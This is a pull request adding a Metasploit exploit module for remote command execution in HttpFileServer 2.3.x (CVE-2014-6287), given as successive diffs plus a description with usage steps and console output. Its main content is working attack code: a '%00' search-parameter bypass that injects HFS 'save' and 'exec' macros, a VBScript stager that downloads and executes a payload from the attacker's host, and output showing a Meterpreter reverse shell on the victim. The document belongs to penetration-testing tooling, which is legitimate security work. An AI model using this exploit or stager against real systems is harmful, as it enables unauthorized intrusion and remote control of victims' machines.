### PR TITLE
Http File Server Remote Command Exec

### DIFF
--- a/modules/exploits/windows/http/http_file_server_exec.rb
+++ b/modules/exploits/windows/http/http_file_server_exec.rb
@@ -6,61 +6,76 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Reank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::HttpServer::HTML
-  include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpServer
+  #include Msf::Exploit::Remote::HttpServer::HTML
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "HttpClient and HttpServer Example",
+      'Name'           => "HttpFileServer 2.3.x Remote Command Execution",
       'Description'    => %q{
-        This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time,
-        but this allows the HttpServer to terminate after a delay.
+         HFS is vulnerable to remote command execution attack due to a poor regex in the file
+         ParserLib.pas. This module exploit the HFS scripting command by using '%00' to bypass
+         the filtering.
       },
       'License'        => MSF_LICENSE,
-      'Author'         => [ 'mfadzilr' ],
+      'Author'         =>
+        [
+          'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal p.o.c
+          'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module
+        ],
       'References'     =>
         [
-          ['URL', 'http://metasploit.com']
+          ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],
+          ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'],
         ],
-      'Payload'        => { 'BadChars' => "\x00" },
+      'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
       'Platform'       => 'win',
       'Targets'        =>
         [
           [ 'Automatic', {} ],
         ],
-      'CmdStagerFlavor' => 'vbs'
+      #'CmdStagerFlavor' => 'vbs',
       'Privileged'     => false,
       'DisclosureDate' => "Sep 14 2014",
       'DefaultTarget'  => 0))
 
       register_options(
         [
-          OptString.new('TARGETURI', [true, 'The path to some web application', '/']),
-          OptInt.new('HTTPDELAY',    [false, 'Number of seconds the web server will wait before termination', 10])
+          OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
+          OptString.new('SAVE_PATH', [true, 'Location where the vbs script will be executed', 'c:\\']),
+          OptInt.new('HTTPDELAY',    [false, 'Seconds to wait before terminating web server', 10]),
         ], self.class)
   end
 
   def on_request_uri(cli, req)
     print_status("#{peer} - Payload request received: #{req.uri}")
     exe = generate_payload_exe
-    send_response(cli, exe, 'You get this, I own you')
+    vbs = Msf::Util::EXE.to_exe_vbs(exe)
+    send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})
   end
 
   def primer
-    uri = target_uri.path
-    fname = "evil.vbs"
-    save_path = "c:\\" + fname
-    vbs_evil = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0ax.Open \x22GET\x22,\x22http://#{RHOST}/#{fname}\x22,False\x0d\x0ax.Send\x0d\x0aExecute x.responseText"
-    exec_save = "%00{.save|save_path|#{vbs_evil}.}"
+
+    file_name = rand_text_alpha(rand(10)+5)
+    file_ext = '.vbs' 
+    file_fullname = file_name + file_ext
+
+    vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0aif err.number <> 0 then wsh.exit\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0ax.Send\x0d\x0aExecute x.responseText"
+
+    payload = "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}"
+    payload = URI::encode(payload)
+
+    exec_cmd = "exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}"
+    exec_cmd = URI::encode(exec_cmd)
+
     print_status("Sending a malicious request to #{target_uri.path}")
-    #send_request_cgi({'uri'=>normalize_uri(target_uri.path)})
-    send_request_cgi({
-      'method' => 'GET',
-      'uri'    => 'normalize_uri(uri,'?search=' + exec_save),
-    })
+    Net::HTTP.get(datastore['RHOST'],"/?search=%00{.#{payload}.}")
+    Net::HTTP.get(datastore['RHOST'],"/?search=%00{.#{exec_cmd}.}")
+
   end
 
   def exploit

--- a/modules/exploits/windows/http/http_file_server_exec.rb
+++ b/modules/exploits/windows/http/http_file_server_exec.rb
@@ -36,7 +36,10 @@ class Metasploit3 < Msf::Exploit::Remote
           ['OSVDB', '111386'],
         ],
       'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
-      # Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600]
+      # Tested HFS 2.3b :
+      # - Windows XP (Build 2600, Service Pack 3).
+      # - Windows 7 (Build 7601, Service Pack 1).
+      # - Windows 8 (Build 9200).
       'Platform'       => 'win',
       'Targets'        =>
         [
@@ -73,9 +76,9 @@ class Metasploit3 < Msf::Exploit::Remote
     exe = generate_payload_exe
     vbs = Msf::Util::EXE.to_exe_vbs(exe)
     send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})
+    remove_resource(get_resource)
     # remove resource after serving 1st request as 'exec' execute 4x
     # during exploitation
-    remove_resource(get_resource)
   end
 
   def primer

--- a/modules/exploits/windows/http/http_file_server_exec.rb
+++ b/modules/exploits/windows/http/http_file_server_exec.rb
@@ -11,34 +11,34 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
   include Msf::Exploit::Remote::HttpServer
-  #include Msf::Exploit::Remote::HttpServer::HTML
 
   def initialize(info={})
     super(update_info(info,
       'Name'           => "HttpFileServer 2.3.x Remote Command Execution",
       'Description'    => %q{
          HFS is vulnerable to remote command execution attack due to a poor regex in the file
-         ParserLib.pas. This module exploit the HFS scripting command by using '%00' to bypass
+         ParserLib.pas. This module exploit the HFS scripting commands by using '%00' to bypass
          the filtering.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal p.o.c
+          'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery
           'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module
         ],
       'References'     =>
         [
           ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],
           ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'],
+          ['CVE', 'CVE-2014-6287'],
         ],
       'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
+      # Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600]
       'Platform'       => 'win',
       'Targets'        =>
         [
           [ 'Automatic', {} ],
         ],
-      #'CmdStagerFlavor' => 'vbs',
       'Privileged'     => false,
       'DisclosureDate' => "Sep 14 2014",
       'DefaultTarget'  => 0))
@@ -46,9 +46,22 @@ class Metasploit3 < Msf::Exploit::Remote
       register_options(
         [
           OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
-          OptString.new('SAVE_PATH', [true, 'Location where the vbs script will be executed', 'c:\\']),
+          OptString.new('SAVE_PATH', [true, 'Target writable path', 'c:\\']),
           OptInt.new('HTTPDELAY',    [false, 'Seconds to wait before terminating web server', 10]),
         ], self.class)
+  end
+
+  def check
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => '/'
+    })
+
+    if res.headers['Server'] =~ /HFS 2.3/
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
   end
 
   def on_request_uri(cli, req)
@@ -56,26 +69,28 @@ class Metasploit3 < Msf::Exploit::Remote
     exe = generate_payload_exe
     vbs = Msf::Util::EXE.to_exe_vbs(exe)
     send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})
+    remove_resource(get_resource) # remove resource after serving 1st reequest.
   end
 
   def primer
-
     file_name = rand_text_alpha(rand(10)+5)
     file_ext = '.vbs' 
     file_fullname = file_name + file_ext
 
-    vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0aif err.number <> 0 then wsh.exit\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0ax.Send\x0d\x0aExecute x.responseText"
+    vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText"
 
-    payload = "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}"
-    payload = URI::encode(payload)
-
-    exec_cmd = "exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}"
-    exec_cmd = URI::encode(exec_cmd)
+    payloads = [
+      "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}",
+      "exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}"
+    ]
 
     print_status("Sending a malicious request to #{target_uri.path}")
-    Net::HTTP.get(datastore['RHOST'],"/?search=%00{.#{payload}.}")
-    Net::HTTP.get(datastore['RHOST'],"/?search=%00{.#{exec_cmd}.}")
-
+    payloads.each { |payload|
+      send_request_raw({
+        'method' => 'GET',
+        'uri'    => "/?search=%00{.#{URI::encode(payload)}.}"
+     })
+    }
   end
 
   def exploit

--- a/modules/exploits/windows/http/http_file_server_exec.rb
+++ b/modules/exploits/windows/http/http_file_server_exec.rb
@@ -9,8 +9,8 @@ class Metasploit3 < Msf::Exploit::Remote
   Reank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::EXE
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
   def initialize(info={})
@@ -30,8 +30,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'     =>
         [
           ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],
+          ['URL', 'http://www.rejetto.com/hfs/download'],
           ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'],
           ['CVE', '2014-6287'],
+          ['OSVDB', '111386'],
         ],
       'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
       # Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600]

--- a/modules/exploits/windows/http/http_file_server_exec.rb
+++ b/modules/exploits/windows/http/http_file_server_exec.rb
@@ -57,7 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'    => '/'
     })
 
-    if res.headers['Server'] =~ /HFS 2\.3/ # added proper regex
+    if res.headers['Server'] =~ /HFS 2\.3/
+    # added proper regex as pointed by wchen
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe
@@ -69,7 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote
     exe = generate_payload_exe
     vbs = Msf::Util::EXE.to_exe_vbs(exe)
     send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})
-    remove_resource(get_resource) # remove resource after serving 1st reequest.
+    # remove resource after serving 1st request as 'exec' execute 4x
+    # during exploitation
+    remove_resource(get_resource)
   end
 
   def primer
@@ -77,12 +80,14 @@ class Metasploit3 < Msf::Exploit::Remote
     file_ext = '.vbs'
     file_fullname = file_name + file_ext
 
-    vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText"
+    vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText"
 
     payloads = [
       "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}",
-      #"exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}"
-      "exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}" # using wscript instead of cmd.exe, thanks mubix
+      "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_fullname}",
+      # using wscript.exe instead of cmd.exe, thank mubix
+      "delete|#{datastore['SAVE_PATH']}#{file_fullname}"
+      # delete vbs file after execution
     ]
 
     print_status("Sending a malicious request to #{target_uri.path}")

--- a/modules/exploits/windows/http/http_file_server_exec.rb
+++ b/modules/exploits/windows/http/http_file_server_exec.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super(update_info(info,
@@ -86,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
       "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}",
       "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_fullname}",
       # using wscript.exe instead of cmd.exe, thank mubix
-      "delete|#{datastore['SAVE_PATH']}#{file_fullname}"
+      #"delete|#{datastore['SAVE_PATH']}#{file_fullname}"
       # delete vbs file after execution
     ]
 
@@ -97,6 +98,8 @@ class Metasploit3 < Msf::Exploit::Remote
         'uri'    => "/?search=%00{.#{URI::encode(payload)}.}"
      })
     }
+    register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_fullname}")
+    # use FileDropper method for cleanup
   end
 
   def exploit

--- a/modules/exploits/windows/http/http_file_server_exec.rb
+++ b/modules/exploits/windows/http/http_file_server_exec.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'    => '/'
     })
 
-    if res.headers['Server'] =~ /HFS 2.3/
+    if res.headers['Server'] =~ /HFS 2\.3/ # added proper regex
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe
@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
     payloads = [
       "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}",
       #"exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}"
-      "exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}"
+      "exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}" # using wscript instead of cmd.exe, thanks mubix
     ]
 
     print_status("Sending a malicious request to #{target_uri.path}")

--- a/modules/exploits/windows/http/http_file_server_exec.rb
+++ b/modules/exploits/windows/http/http_file_server_exec.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'Automatic', {} ],
         ],
       'Privileged'     => false,
-      'DisclosureDate' => "Sep 14 2014",
+      'DisclosureDate' => "Sep 11 2014",
       'DefaultTarget'  => 0))
 
       register_options(
@@ -81,7 +81,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     payloads = [
       "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}",
-      "exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}"
+      #"exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}"
+      "exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}"
     ]
 
     print_status("Sending a malicious request to #{target_uri.path}")

--- a/modules/exploits/windows/http/http_file_server_exec.rb
+++ b/modules/exploits/windows/http/http_file_server_exec.rb
@@ -1,0 +1,73 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "HttpClient and HttpServer Example",
+      'Description'    => %q{
+        This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time,
+        but this allows the HttpServer to terminate after a delay.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'mfadzilr' ],
+      'References'     =>
+        [
+          ['URL', 'http://metasploit.com']
+        ],
+      'Payload'        => { 'BadChars' => "\x00" },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ],
+        ],
+      'CmdStagerFlavor' => 'vbs'
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 14 2014",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The path to some web application', '/']),
+          OptInt.new('HTTPDELAY',    [false, 'Number of seconds the web server will wait before termination', 10])
+        ], self.class)
+  end
+
+  def on_request_uri(cli, req)
+    print_status("#{peer} - Payload request received: #{req.uri}")
+    exe = generate_payload_exe
+    send_response(cli, exe, 'You get this, I own you')
+  end
+
+  def primer
+    uri = target_uri.path
+    fname = "evil.vbs"
+    save_path = "c:\\" + fname
+    vbs_evil = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0ax.Open \x22GET\x22,\x22http://#{RHOST}/#{fname}\x22,False\x0d\x0ax.Send\x0d\x0aExecute x.responseText"
+    exec_save = "%00{.save|save_path|#{vbs_evil}.}"
+    print_status("Sending a malicious request to #{target_uri.path}")
+    #send_request_cgi({'uri'=>normalize_uri(target_uri.path)})
+    send_request_cgi({
+      'method' => 'GET',
+      'uri'    => 'normalize_uri(uri,'?search=' + exec_save),
+    })
+  end
+
+  def exploit
+    begin
+      Timeout.timeout(datastore['HTTPDELAY']) { super }
+      rescue Timeout::Error
+      # When the server stops due to our timeout, this is raised
+    end
+  end
+end

--- a/modules/exploits/windows/http/http_file_server_exec.rb
+++ b/modules/exploits/windows/http/http_file_server_exec.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],
           ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'],
-          ['CVE', 'CVE-2014-6287'],
+          ['CVE', '2014-6287'],
         ],
       'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
       # Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600]
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def primer
     file_name = rand_text_alpha(rand(10)+5)
-    file_ext = '.vbs' 
+    file_ext = '.vbs'
     file_fullname = file_name + file_ext
 
     vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText"


### PR DESCRIPTION
Add "http_file_server_exec" remote exploitation module

Remote command execution bypass macro filters, using "%00" to bypass filters, 'save' and 'exec' macro command to create vbs file dan execute the vbs script on the target system. please note that when using "exec", it will execute 4 x times.
- Homepage: http://www.rejetto.com
- Software Download: http://www.rejetto.com/hfs/download (they already release a patch)
- Alternate Download: http://www.exploit-db.com/wp-content/themes/exploit/applications/abb497bd93aff9fa3379b2aaf73fc9c7-hfs2.3_288.zip
- Tested On: HFS v2.3b
  - Windows XP (Build 2600, Service Pack 3).
  - Windows 7 (Build 7601, Service Pack 1).
  - Windows 8 (Build 9200).
- Usage:
  - Download the vulnerable software from link above
  - Execute the vulnerable software
  - Run module, make sure "SAVE_PATH" end with \ e.g C:\test\
    <IMAGE HERE>
    ![meterpreter_success](https://cloud.githubusercontent.com/assets/4267222/4345209/59457a1c-40bd-11e4-8143-c653f6f26659.PNG)
# Notes

Tested on target host without antivirus installed.
# Example Output

msf exploit(http_file_server_exec) > exploit
[*] Exploit running as background job.
msf exploit(http_file_server_exec) >
[*] Started reverse handler on 192.168.175.142:4444
[*] Using URL: http://0.0.0.0:8080/791wKD
[*]  Local IP: http://192.168.175.142:8080/791wKD
[*] Server started.
[*] Sending a malicious request to /
[*] 192.168.175.134  http_file_server_exec - 192.168.175.134:80 - Payload request received: /791wKD
[*] Sending stage (769536 bytes) to 192.168.175.134
[*] Meterpreter session 5 opened (192.168.175.142:4444 -> 192.168.175.134:1335) at 2014-09-20 18:05:48 +0800
[+] Deleted c:\test\VtdVFRGk.vbs
[*] Server stopped.

msf exploit(http_file_server_exec) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > shell
Process 2072 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\pentest\Desktop>
